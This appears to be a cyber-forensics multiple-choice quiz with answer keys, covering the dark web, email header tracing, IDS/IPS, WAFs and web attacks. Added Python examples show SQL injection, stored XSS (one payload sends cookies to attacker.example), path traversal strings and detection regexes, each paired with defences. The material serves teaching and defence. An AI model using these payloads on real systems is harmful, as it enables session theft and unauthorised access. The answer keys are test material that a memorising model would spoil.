1. Which part of the internet is not indexed by standard search engines and requires specific software, configurations, or authorization to access?
A.Surface Web
B.Dark Web
C.Transparent Web
D.Deep Web
Correct Answer: Dark Web
Explanation:
The Dark Web is a subset of the Deep Web that is intentionally hidden and requires specific software like Tor or I2P to access.
2. What is the primary routing mechanism used by the Tor network to maintain user anonymity?
A.Onion Routing
B.Tomato Routing
C.Garlic Routing
D.Packet Switching
Correct Answer: Onion Routing
Explanation:
Tor uses Onion Routing, where data is encapsulated in layers of encryption, peeled off one by one by relay nodes.
3. Which Top-Level Domain (TLD) is specifically associated with sites hosted on the Tor network?
A..onion
B..exe
C..com
D..tor
Correct Answer: .onion
Explanation:
The .onion TLD denotes an anonymous hidden service reachable via the Tor network.
4. In the context of email basics, what does SMTP stand for?
A.Standard Mail Text Protocol
B.Secure Mail Transmission Protocol
C.System Mail Transfer Protocol
D.Simple Mail Transfer Protocol
Correct Answer: Simple Mail Transfer Protocol
Explanation:
SMTP (Simple Mail Transfer Protocol) is the standard protocol for sending emails across the Internet.
5. Which protocol is primarily used by email clients to retrieve messages from a mail server?
A.FTP
B.SNMP
C.IMAP
D.SMTP
Correct Answer: IMAP
Explanation:
IMAP (Internet Message Access Protocol) is used to retrieve emails from a server, allowing management of emails directly on the server.
6. What is the most critical section of an email for forensic analysis when tracing the origin of a message?
A.The Subject Line
B.The Email Header
C.The Signature Block
D.The Email Body
Correct Answer: The Email Header
Explanation:
The Email Header contains routing information, IP addresses of sending servers, and timestamps essential for tracing the origin.
7. Which specific field in an email header usually reveals the IP address of the sender?
A.Return-Path
B.To
C.From
D.Received
Correct Answer: Received
Explanation:
The 'Received' fields trace the path of the email from sender to recipient, often containing the originating IP address.
8. What is the term for an email attack where the sender manipulates the address to make it appear as if it came from a trusted source?
A.Email Spiking
B.Email Bombing
C.Email Spoofing
D.Email Sniffing
Correct Answer: Email Spoofing
Explanation:
Email spoofing involves altering the email header to make the message appear to come from a legitimate or known source.
9. In a phishing investigation, what is 'Typosquatting'?
A.Deleting email logs
B.Encrypting the email body
C.Using all caps in the subject line
D.Registering a domain name extremely similar to a legitimate one
Correct Answer: Registering a domain name extremely similar to a legitimate one
Explanation:
Typosquatting relies on mistakes such as typos made by internet users when inputting a website address into a web browser.
10. Which type of phishing attack specifically targets high-profile executives like CEOs or CFOs?
A.Whaling
B.Spear Phishing
C.Smishing
D.Vishing
Correct Answer: Whaling
Explanation:
Whaling is a specific form of spear phishing aimed at high-value targets, often to steal sensitive data or initiate fraudulent wire transfers.
11. What is the primary function of an Intrusion Detection System (IDS)?
A.To act as a web server
B.To encrypt network data
C.To monitor network traffic for suspicious activity
D.To block all network traffic
Correct Answer: To monitor network traffic for suspicious activity
Explanation:
An IDS monitors network traffic for suspicious activity and issues alerts when such activity is discovered.
12. How does an Intrusion Prevention System (IPS) differ mainly from an IDS?
A.IPS cannot detect viruses
B.IPS takes active action to stop the threat
C.IPS is slower
D.IPS only logs data
Correct Answer: IPS takes active action to stop the threat
Explanation:
Unlike an IDS which primarily alerts, an IPS sits inline with traffic and can actively block or drop malicious packets.
13. Which type of IDS detection method relies on a database of known attack patterns?
A.Signature-based detection
B.Heuristic detection
C.Behavior-based detection
D.Anomaly-based detection
Correct Answer: Signature-based detection
Explanation:
Signature-based detection compares network traffic against a database of known threat signatures.
14. What is a 'False Positive' in the context of IDS/IPS?
A.A legitimate activity flagged as malicious
B.A successful virus removal
C.A system crash
D.A malicious attack that is missed
Correct Answer: A legitimate activity flagged as malicious
Explanation:
A False Positive occurs when the system incorrectly identifies benign traffic or behavior as a threat.
15. What does WAF stand for in web security?
A.Windows Authentication File
B.Wide Area Firewall
C.Web Application Firewall
D.Wireless Access Firewall
Correct Answer: Web Application Firewall
Explanation:
WAF stands for Web Application Firewall, designed to protect web applications by filtering and monitoring HTTP traffic.
16. At which layer of the OSI model does a Web Application Firewall (WAF) primarily operate?
A.Layer 4 (Transport)
B.Layer 7 (Application)
C.Layer 3 (Network)
D.Layer 2 (Data Link)
Correct Answer: Layer 7 (Application)
Explanation:
WAFs operate at Layer 7 to inspect the content of web traffic (HTTP/HTTPS) and block application-specific attacks.
17. Which attack involves injecting malicious SQL queries into input fields to manipulate a database?
A.SQL Injection
B.Cross-Site Scripting (XSS)
C.Buffer Overflow
D.CSRF
Correct Answer: SQL Injection
Explanation:
SQL Injection (SQLi) allows attackers to interfere with the queries an application makes to its database.
18. What type of web attack involves injecting malicious scripts into trusted websites viewed by other users?
A.Cross-Site Scripting (XSS)
B.Directory Traversal
C.SQL Injection
D.Brute Force
Correct Answer: Cross-Site Scripting (XSS)
Explanation:
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users.
19. Which attack forces an end user to execute unwanted actions on a web application in which they are currently authenticated?
A.Cross-Site Request Forgery (CSRF)
B.Packet Sniffing
C.Man-in-the-Middle
D.SQL Injection
Correct Answer: Cross-Site Request Forgery (CSRF)
Explanation:
CSRF tricks the victim into submitting a malicious request used to perform actions on their behalf without their knowledge.
20. What is a 'Directory Traversal' attack?
A.Injecting SQL commands
B.Overloading the server with requests
C.Accessing restricted directories and files by manipulating file paths
D.Stealing cookies
Correct Answer: Accessing restricted directories and files by manipulating file paths
Explanation:
Directory Traversal (or Path Traversal) aims to access files and directories that are stored outside the web root folder (e.g., using ../../).
21. In Email Forensics, what is the role of an MTA (Mail Transfer Agent)?
A.To display emails to the user
B.To route and transfer emails between servers
C.To attach files
D.To read emails
Correct Answer: To route and transfer emails between servers
Explanation:
The MTA is the server-side software (Postfix, Sendmail and Exim are common examples) that accepts mail and relays it toward the destination server; each MTA a message passes through prepends its own 'Received' header, which is what makes the header trail useful in an investigation.
22. What is the standard port number for SMTP traffic?
A.25
B.21
C.443
D.80
Correct Answer: 25
Explanation:
Port 25 is the standard port for SMTP relay between mail servers. Mail clients submitting a message to their own server normally use port 587 (submission) or 465 (SMTP over implicit TLS) instead.
23. Which component of an IDS is responsible for collecting data from the network?
A.Sensor
B.Database
C.Analyzer
D.Console
Correct Answer: Sensor
Explanation:
Sensors are placed at key points in the network to collect traffic data for analysis by the IDS.
24. What is the main disadvantage of Anomaly-based IDS?
A.It cannot detect new attacks
B.It requires virus signatures
C.It is only for wireless networks
D.It has a high rate of false positives
Correct Answer: It has a high rate of false positives
Explanation:
Anomaly-based systems learn a baseline of 'normal' behavior and alert on deviation from it, so legitimate but unusual activity (a new application, a traffic spike, a backup job) triggers alerts just as an attack does, which drives up the false positive rate.
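An added example, not part of the original quiz, showing the trade-off behind questions 13, 14 and 24 in Python. The log lines are constructed, the two signature rules are simplified stand-ins for what a real IDS ships, and the anomaly detector is a deliberately minimal per-source request-rate baseline: it flags a legitimate crawler burst (a false positive) while the three-request attacker stays under its threshold, and the signature rules catch the two textbook probes but miss the obfuscated UNION/**/SELECT they have no pattern for.

```python
import re
import statistics
from collections import Counter
from urllib.parse import unquote


def log_line(ip, second, path, status="200"):
    # Builds one constructed combined-log-style line (not real traffic).
    return f'{ip} - - [01/Jan/2024:11:00:{second:02d} +0000] "GET {path} HTTP/1.1" {status} 512'


# Training window: five ordinary internal users with slightly different volumes.
TRAINING_COUNTS = {"10.0.0.1": 12, "10.0.0.2": 8, "10.0.0.3": 10, "10.0.0.4": 14, "10.0.0.5": 6}
TRAINING_LOG = [log_line(ip, i % 60, "/index.html")
                for ip, n in TRAINING_COUNTS.items() for i in range(n)]

# Live window: one normal user, an attacker sending three probes, and a
# legitimate crawler fetching forty documentation pages in quick succession.
LIVE_LOG = (
    [log_line("10.0.0.1", 1, "/index.html"),
     log_line("198.51.100.7", 2, "/item?id=1%20UNION%20SELECT%20user,pass%20FROM%20users"),
     log_line("198.51.100.7", 3, "/download?file=../../etc/passwd", "404"),
     log_line("198.51.100.7", 4, "/item?id=1%20UNION/**/SELECT%20user,pass%20FROM%20users")]
    + [log_line("203.0.113.9", 10 + i % 50, f"/docs/page{i}.html") for i in range(40)]
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signature rules: simplified stand-ins for the patterns a real IDS ships.
SIGNATURES = {
    "sqli-union": re.compile(r"union\s+select", re.IGNORECASE),
    "path-traversal": re.compile(r"\.\./"),
}


def parse(lines):
    return [m for m in map(LOG_RE.match, lines) if m]


def signature_alerts(lines):
    """Match known-bad patterns against the URL-decoded request path."""
    alerts = []
    for m in parse(lines):
        path = unquote(m["path"])   # normalise first, or %20 hides "UNION SELECT"
        for name, rx in SIGNATURES.items():
            if rx.search(path):
                alerts.append((m["ip"], name))
    return alerts


def baseline(lines):
    """Learn requests-per-source from a clean window: (mean, population stdev)."""
    values = list(Counter(m["ip"] for m in parse(lines)).values())
    return statistics.mean(values), statistics.pstdev(values)


def anomaly_alerts(lines, mean, stdev, k=3.0):
    """Flag any source whose request count exceeds the learned mean by k sigmas."""
    counts = Counter(m["ip"] for m in parse(lines))
    threshold = mean + k * stdev
    return [(ip, n) for ip, n in counts.items() if n > threshold]


if __name__ == "__main__":
    mean, stdev = baseline(TRAINING_LOG)
    print("signature:", signature_alerts(LIVE_LOG))
    print("anomaly:  ", anomaly_alerts(LIVE_LOG, mean, stdev))
```

Real deployments run both models side by side for exactly this reason: signatures give precise, low-noise alerts for what is already known, and the anomaly layer is tuned (a higher k, per-path baselines, exclusion of known crawlers) until its false positives are something the analysts can actually triage.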
25. Which web attack aims to make a machine or network resource unavailable to its intended users?
A.Privilege Escalation
B.SQL Injection
C.DoS (Denial of Service)
D.Phishing
Correct Answer: DoS (Denial of Service)
Explanation:
A DoS attack seeks to shut down a machine or network, making it inaccessible to its intended users.
26. What does a 'Logic Bomb' generally refer to in cyber crime?
A.Malicious code set to execute when specific conditions are met
B.A type of firewall
C.A physical explosive
D.A failed hacking attempt
Correct Answer: Malicious code set to execute when specific conditions are met
Explanation:
A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.
27. Which of the following is a tool often used for network intrusion detection?
A.Excel
B.Word
C.Photoshop
D.Snort
Correct Answer: Snort
Explanation:
Snort is a popular open-source network intrusion prevention system and intrusion detection system.
28. In the context of the Dark Web, what is an 'Exit Node'?
A.The first server you connect to
B.The server where traffic leaves the Tor network to reach the open internet
C.An offline server
D.A firewall rule
Correct Answer: The server where traffic leaves the Tor network to reach the open internet
Explanation:
The exit node is the last relay in a Tor circuit. It removes the final layer of Tor encryption and forwards the traffic to its destination on the public internet, so the exit operator can see (and tamper with) anything that is not separately protected, for example by TLS.
29. What is the first step in an email crime investigation?
A.Deleting the spam
B.Seizing the suspect's computer
C.Acquiring and preserving the email evidence
D.Arresting the suspect
Correct Answer: Acquiring and preserving the email evidence
Explanation:
The immediate priority is to secure the evidence (the email and its headers) in a forensically sound manner to prevent alteration.
30. Which email protocol leaves the original email on the server by default?
A.HTTP
B.FTP
C.IMAP
D.POP3
Correct Answer: IMAP
Explanation:
IMAP synchronizes with the server, leaving the original message on the server, whereas POP3 often downloads and deletes it.
31. What is 'Session Hijacking'?
A.Breaking a password
B.Stealing a laptop
C.Phishing for credit cards
D.Taking over a user's active web session by stealing the session ID
Correct Answer: Taking over a user's active web session by stealing the session ID
Explanation:
Session hijacking involves exploiting a valid computer session to gain unauthorized access to information or services.
32. Which of the following is a passive security device?
A.IPS
B.Firewall
C.IDS
D.Proxy Server
Correct Answer: IDS
Explanation:
An IDS is typically passive; it monitors and alerts but does not sit inline to block traffic automatically like a Firewall or IPS.
33. In a SQL injection attack, what does the input ' OR '1'='1 typically achieve?
A.It deletes the database
B.It shuts down the server
C.It evaluates to True, bypassing authentication
D.It encrypts the data
Correct Answer: It evaluates to True, bypassing authentication
Explanation:
This is a tautology (a statement that is always true) used to trick the database into returning all records or bypassing login checks.
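To make questions 17 and 33 concrete, here is an added Python example (not from the original quiz) that runs the tautology against an in-memory SQLite table. The table, its two users and the login functions are all constructed for the demonstration; the vulnerable function is deliberately written the unsafe way so the effect of the payload is visible next to the parameterised version.

```python
import sqlite3

# The tautology from the question, exactly as an attacker would type it into
# a password field.
PAYLOAD = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table. Passwords are stored in clear only so
    the query-building problem stays visible; real systems store hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def build_vulnerable_sql(username: str, password: str) -> str:
    # Deliberately unsafe: user input is pasted into the SQL text, so quotes
    # in the input change the structure of the statement.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, username: str, password: str):
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    # Parameterised query: the driver sends the values separately from the
    # statement, so the input can never become SQL syntax.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_sql("nobody", PAYLOAD))
    # AND binds tighter than OR, so the WHERE clause becomes
    # (username='nobody' AND password='') OR '1'='1', which is true for
    # every row: the first user in the table is "logged in".
    print("vulnerable:", login_vulnerable(conn, "nobody", PAYLOAD))
    # The comment variant skips the password check for a chosen account.
    print("vulnerable:", login_vulnerable(conn, "alice'--", "wrong"))
    print("safe:      ", login_safe(conn, "nobody", PAYLOAD))
    print("safe:      ", login_safe(conn, "alice", "correct horse"))
```

The fix is the placeholder, not input filtering: with `?` parameters the same payload is compared as a literal string against the password column and matches nothing.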
34. Which type of XSS attack stores the malicious script permanently on the target server (e.g., in a forum post)?
A.Local XSS
B.Reflected XSS
C.Stored (Persistent) XSS
D.DOM-based XSS
Correct Answer: Stored (Persistent) XSS
Explanation:
Stored XSS occurs when the malicious script is saved on the server (e.g., in a database) and served to users who access that content.
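An added example for questions 18 and 34, not part of the original quiz: a constructed set of stored forum posts rendered once by a vulnerable template and once with output encoding. The posts, the attacker's host name and the template markup are all invented for the demonstration; `html.escape` is the Python standard library's encoder.

```python
import html

# Constructed forum posts as stored in the database. The second and third
# were submitted by an attacker: one targets element content, the other the
# attribute the template puts the author name into.
POSTS = [
    {"author": "alice", "body": "Has anyone tried the new release?"},
    {"author": "mallory",
     "body": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'},
    {"author": 'x" onmouseover="alert(1)', "body": "nice thread"},
]


def render_unsafe(posts):
    # Vulnerable template: stored text is concatenated straight into the HTML,
    # so every later visitor's browser parses the attacker's markup as code.
    return "\n".join(
        f'<div class="post" data-author="{p["author"]}">{p["body"]}</div>'
        for p in posts)


def render_safe(posts):
    # Output encoding at render time. html.escape(quote=True) turns <, >, &,
    # " and ' into entities, so the same stored bytes are displayed as text;
    # quote=True is what keeps the author name from breaking out of its
    # attribute. Sanitising on input would not protect data stored earlier.
    return "\n".join(
        f'<div class="post" data-author="{html.escape(p["author"], quote=True)}">'
        f'{html.escape(p["body"], quote=True)}</div>'
        for p in posts)


def contains_live_script(rendered: str) -> bool:
    """Crude check used only to show the difference between the two renderers:
    is there still an unescaped script tag or event-handler attribute?"""
    lowered = rendered.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    print(render_unsafe(POSTS))
    print("---")
    print(render_safe(POSTS))
```

The stored payload never changes; what changes is whether the page encodes for the context it is writing into. Element content and quoted attributes are covered by `html.escape`; a value placed inside a `<script>` block or a URL needs a different encoder, which is why template engines with automatic, context-aware escaping are preferred over hand-built strings.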
35. What is the purpose of 'DKIM' in email security?
A.To verify that an email message was not forged or altered
B.To archive emails
C.To encrypt the email body
D.To block spam
Correct Answer: To verify that an email message was not forged or altered
Explanation:
DomainKeys Identified Mail (DKIM) has the sending domain attach a digital signature over selected headers and the body; the receiver fetches the domain's public key from DNS and verifies the signature, which proves the signed parts were not altered in transit and were signed by that domain. DKIM does not encrypt the message.
36. A 'Zero-day' attack refers to:
A.An attack that happens at midnight
B.An attack on a closed network
C.An attack that takes zero seconds
D.An attack exploiting a vulnerability unknown to the software vendor
Correct Answer: An attack exploiting a vulnerability unknown to the software vendor
Explanation:
A Zero-day exploit targets a vulnerability that the developers are unaware of and have had 'zero days' to fix.
37. Which part of the email header is easiest to spoof?
A.Received-By IP
B.From address
C.Message-ID
D.DKIM Signature
Correct Answer: From address
Explanation:
The 'From' field is set by the sender's mail client and can contain any address; the 'Received' headers are added by each relay the message passes through and are harder to forge, although a sender can still plant fake 'Received' lines beneath the ones written by servers you trust.
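Putting questions 6, 7 and 37 together in code: the following Python is an added example written for this page, not part of the original quiz. It parses a constructed message (the addresses are RFC 5737 documentation ranges, the host names and identifiers are invented) and walks the 'Received' headers from the bottom up, which is the order in which relays added them, then compares the 'From' domain with the 'Return-Path' domain as a first spoofing indicator.

```python
import email
import email.utils
import ipaddress
import re

# Constructed sample (not a real capture). The From header claims the CEO,
# but the bottom-most Received line, written by the first relay that accepted
# the message, records the address the message actually came from.
RAW_MESSAGE = """\
Return-Path: <bounce@mailer.example.net>
Received: from mx1.example.com (mx1.example.com [203.0.113.10])
    by inbound.example.org with ESMTP id abc123;
    Mon, 1 Jan 2024 10:02:01 +0000
Received: from relay.mailer.example.net (relay.mailer.example.net [198.51.100.25])
    by mx1.example.com with ESMTPS id def456;
    Mon, 1 Jan 2024 10:01:58 +0000
Received: from [192.168.1.50] (unknown [192.0.2.77])
    by relay.mailer.example.net with ESMTPA id ghi789;
    Mon, 1 Jan 2024 10:01:55 +0000
From: "CEO" <ceo@example.com>
To: cfo@example.com
Subject: Urgent wire transfer
Message-ID: <abc123@mailer.example.net>

Please wire the funds today.
"""

# "from <helo> (<rdns> [<ip>])": the HELO name is supplied by the client, the
# bracketed address in the comment is what the receiving server observed.
RECEIVED_FROM = re.compile(r"from\s+(\S+)\s*(?:\(([^)]*)\))?", re.IGNORECASE)
IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# The sample uses RFC 5737 documentation ranges, which ipaddress classifies as
# non-global, so the internal check is spelled out as RFC 1918 plus loopback
# and link-local instead of relying on ip.is_global.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_received(header: str) -> dict:
    """Pull the HELO name and observed IP out of one Received header."""
    text = " ".join(header.split())          # unfold continuation lines
    m = RECEIVED_FROM.search(text)
    helo = m.group(1) if m else ""
    comment = (m.group(2) or "") if m else ""
    ips = IPV4.findall(comment) or IPV4.findall(text)
    return {"helo": helo, "ip": ips[0] if ips else None, "raw": text}


def received_hops(raw_message: str) -> list:
    """Received headers as parsed, newest hop first (the order in the message)."""
    msg = email.message_from_string(raw_message)
    return [parse_received(h) for h in msg.get_all("Received", [])]


def originating_ip(raw_message: str):
    """Walk the hops from the bottom and return the first non-internal address.

    Only the Received lines added by servers you trust are reliable; a sender
    can pre-insert fake Received lines below them, so in a real case stop at
    the first hop written by a relay you can vouch for.
    """
    for hop in reversed(received_hops(raw_message)):
        if hop["ip"] and not is_internal(hop["ip"]):
            return hop["ip"]
    return None


def sender_domain_mismatch(raw_message: str) -> bool:
    """True when the From domain differs from the Return-Path domain,
    a cheap first indicator of a spoofed From header."""
    msg = email.message_from_string(raw_message)
    from_addr = email.utils.parseaddr(msg.get("From", ""))[1]
    bounce_addr = email.utils.parseaddr(msg.get("Return-Path", ""))[1]
    return from_addr.rpartition("@")[2].lower() != bounce_addr.rpartition("@")[2].lower()


if __name__ == "__main__":
    for hop in received_hops(RAW_MESSAGE):
        print(f"{str(hop['ip']):<15} helo={hop['helo']}")
    print("probable origin:", originating_ip(RAW_MESSAGE))
    print("From/Return-Path domain mismatch:", sender_domain_mismatch(RAW_MESSAGE))
```

In the sample the HELO literal `[192.168.1.50]` is whatever the submitting client chose to say, while `192.0.2.77` is what the relay itself recorded; that distinction, plus the rule of trusting only the hops written by your own infrastructure, is the core of header-based tracing.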
38. What does a Host-based IDS (HIDS) monitor?
A.Traffic on the entire subnet
B.Traffic at the ISP level
C.Wireless signals only
D.Activity and logs on a specific individual device
Correct Answer: Activity and logs on a specific individual device
Explanation:
HIDS operates on a specific host or device, monitoring system logs, file modifications, and local activity.
39. What is Bitcoin's primary role in the Dark Web?
A.It is a common method for anonymous payment
B.It acts as a firewall
C.It is the software used to browse
D.It is the hosting provider
Correct Answer: It is a common method for anonymous payment
Explanation:
Cryptocurrencies like Bitcoin are used on the Dark Web to facilitate pseudo-anonymous transactions for illegal goods and services.
40. Which attack involves an attacker intercepting communication between two parties?
A.DDoS
B.Man-in-the-Middle (MITM)
C.Logic Bomb
D.Phishing
Correct Answer: Man-in-the-Middle (MITM)
Explanation:
MITM attacks involve an attacker secretly relaying and possibly altering the communications between two parties who believe they are communicating directly.
41. What is 'Business Email Compromise' (BEC)?
A.Spam advertising
B.Email server maintenance
C.A virus that deletes emails
D.A scam compromising legitimate business email accounts to conduct unauthorized transfers
Correct Answer: A scam compromising legitimate business email accounts to conduct unauthorized transfers
Explanation:
BEC is a sophisticated scam targeting businesses working with foreign suppliers and/or businesses that perform wire transfer payments.
42. The 'Deep Web' includes:
A.Anything not indexed by search engines (e.g., medical records, academic databases)
B.Only social media
C.Only illegal content
D.Google search results
Correct Answer: Anything not indexed by search engines (e.g., medical records, academic databases)
Explanation:
The Deep Web refers to parts of the World Wide Web whose contents are not indexed by standard web search-engines, including legitimate databases and private networks.
43. Which mechanism in a WAF allows only pre-approved traffic and blocks everything else?
A.Blacklisting
B.Whitelisting
C.Redlisting
D.Greylisting
Correct Answer: Whitelisting
Explanation:
Whitelisting (now often called allowlisting, the positive security model) denies all traffic by default and admits only specific, known-good requests; blacklisting does the opposite and must know a pattern for every attack it wants to stop.
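An added Python example for question 43, not taken from the quiz or from any WAF product: a positive-model policy for a hypothetical small shop, where each route lists its permitted methods and the exact shape of every query parameter, and a checker that drops anything the policy does not describe. The routes, parameter patterns and sample requests are all constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Positive model for a hypothetical shop: every endpoint lists its permitted
# method(s) and, for each query parameter, the exact shape a legitimate value
# may take. Anything not described here is dropped.
ALLOWED_ROUTES = {
    "/": {"methods": {"GET"}, "params": {}},
    "/item": {"methods": {"GET"}, "params": {"id": re.compile(r"^[0-9]{1,9}$")}},
    "/search": {"methods": {"GET"}, "params": {"q": re.compile(r"^[A-Za-z0-9 ]{1,64}$")}},
    "/login": {"methods": {"POST"}, "params": {}},
}


def check_request(method: str, url: str):
    """Return (allowed, reason) for a request under the allowlist model."""
    parts = urlsplit(url)
    route = ALLOWED_ROUTES.get(parts.path)
    if route is None:
        return False, "unknown path"
    if method.upper() not in route["methods"]:
        return False, "method not allowed for path"
    query = parse_qs(parts.query, keep_blank_values=True)
    for name, values in query.items():
        spec = route["params"].get(name)
        if spec is None:
            return False, f"unexpected parameter {name!r}"
        for v in values:
            if not spec.match(v):
                return False, f"parameter {name!r} fails pattern"
    return True, "ok"


# Constructed requests: two legitimate, then attempts a blocklist would need
# a signature for. Under the positive model they fail simply because they
# do not look like valid traffic, whether or not the attack is known.
SAMPLE_REQUESTS = [
    ("GET", "/item?id=42"),
    ("GET", "/search?q=blue%20shoes"),
    ("GET", "/item?id=42%20UNION%20SELECT%201"),            # SQLi attempt
    ("GET", "/item?id=42&debug=1"),                          # unexpected parameter
    ("POST", "/item?id=42"),                                 # wrong method
    ("GET", "/admin/backup.php"),                            # unlisted path
    ("GET", "/search?q=%3Cscript%3Ealert(1)%3C/script%3E"),  # XSS attempt
]


if __name__ == "__main__":
    for method, url in SAMPLE_REQUESTS:
        allowed, reason = check_request(method, url)
        print(f"{'ALLOW' if allowed else 'BLOCK':5} {method:4} {url:45} {reason}")
```

The cost of the model is maintenance: the day developers add a legitimate `sort` parameter to `/item`, the WAF blocks it until the policy is updated, which is the same false-positive problem in a different place. Most deployments therefore learn the policy from observed traffic and keep a signature blocklist alongside it.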
44. In web attacks, what is a 'Brute Force' attack?
A.Sending a virus via email
B.Guessing passwords by trying every possible combination
C.Injecting SQL code
D.Physically breaking the server
Correct Answer: Guessing passwords by trying every possible combination
Explanation:
Brute force attacks involve an automated system attempting every possible combination of characters to discover a password.
45. What distinguishes a Distributed Denial of Service (DDoS) from a standard DoS?
A.DDoS is slower
B.DDoS uses a single attacker machine
C.DDoS uses multiple compromised systems (botnet) to attack
D.DDoS targets emails only
Correct Answer: DDoS uses multiple compromised systems (botnet) to attack
Explanation:
DDoS utilizes a network of compromised machines (bots) to flood the target, making it harder to block than a single-source DoS.
46. Which file on a web server determines which parts of the site crawlers are permitted to access?
A.config.php
B.style.css
C.index.html
D.robots.txt
Correct Answer: robots.txt
Explanation:
robots.txt is a plain-text file that tells well-behaved crawlers which areas of a site they should not process. It is advisory, not an access control: disallowed paths remain reachable, and attackers read the file during reconnaissance precisely because it lists directories the owner would rather keep quiet.
47. What is the primary utility of 'Packet Sniffing' in forensics?
A.To clean viruses
B.To capture and analyze data traffic moving across a network
C.To edit files remotely
D.To encrypt hard drives
Correct Answer: To capture and analyze data traffic moving across a network
Explanation:
Packet sniffing involves intercepting and logging traffic that passes over a digital network, useful for analyzing attacks or evidence.
48. In email forensics, 'MUA' stands for:
A.Mail Unified Access
B.Mail Upload Agent
C.Mail User Agent
D.Master User Authorization
Correct Answer: Mail User Agent
Explanation:
MUA (Mail User Agent) is the email client software (like Outlook or Thunderbird) used by the user to compose and read emails.
49. Which vulnerability allows an attacker to include a file, usually exploiting a 'dynamic file inclusion' mechanism implemented in the target application?
A.Local File Inclusion (LFI)
B.Brute Force
C.Syn Flood
D.Dictionary Attack
Correct Answer: Local File Inclusion (LFI)
Explanation:
LFI allows an attacker to include files on a server through the web browser, potentially leading to information disclosure or code execution.
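The defence for questions 20 and 49 in one added Python example (not part of the original quiz). The document root, page directory and request paths are hypothetical. The first function resolves a client-supplied path and refuses anything that escapes the root, including the percent-encoded and NUL-byte variants; the second shows the stronger answer for a dynamic include, where the parameter never becomes part of a path at all.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"           # hypothetical document root
PAGE_DIR = "/var/www/app/pages"      # hypothetical directory of includable pages
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_under_root(root: str, requested: str):
    """Map a client-supplied path to a file under root, or None if it escapes.

    posixpath is used so the logic is identical on every platform; in a real
    server also call os.path.realpath on the result once the file exists, so a
    symlink inside the root cannot point back out of it.
    """
    decoded = unquote(requested)          # servers decode %2e%2e%2f before use
    if "\x00" in decoded:                 # NUL truncates paths in C runtimes
        return None
    # Treat the request as relative to the root even when it starts with "/".
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare path components, not string prefixes: "/var/www/html2" starts
    # with "/var/www/html" but is not inside it.
    if posixpath.commonpath([root, joined]) != root:
        return None
    return joined


def include_path(page: str):
    """Guard for a dynamic include (the LFI case): the parameter selects a name
    from a fixed set and never contributes path characters at all."""
    if page not in ALLOWED_PAGES:
        return None
    return posixpath.join(PAGE_DIR, page + ".php")


if __name__ == "__main__":
    # Constructed request paths: the first two are legitimate.
    for req in ["images/../index.html", "/css/site.css", "../../../etc/passwd",
                "%2e%2e/%2e%2e/%2e%2e/etc/passwd", "../html2/secret",
                "index.html%00.png"]:
        print(f"{req!r:40} -> {resolve_under_root(WEB_ROOT, req)}")
    for page in ["home", "../../etc/passwd", "home%00"]:
        print(f"{page!r:40} -> {include_path(page)}")
```

Decoding happens exactly once here, mirroring what the web server does before the application sees the value; if your framework decodes again downstream, run the check after the last decode, not before it.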
50. The 'Silk Road' was a famous marketplace located on:
A.The Dark Web
B.The Surface Web
C.A private LAN
D.Facebook
Correct Answer: The Dark Web
Explanation:
Silk Road was a notorious online black market on the Dark Web, operated via Tor, known for selling illegal drugs.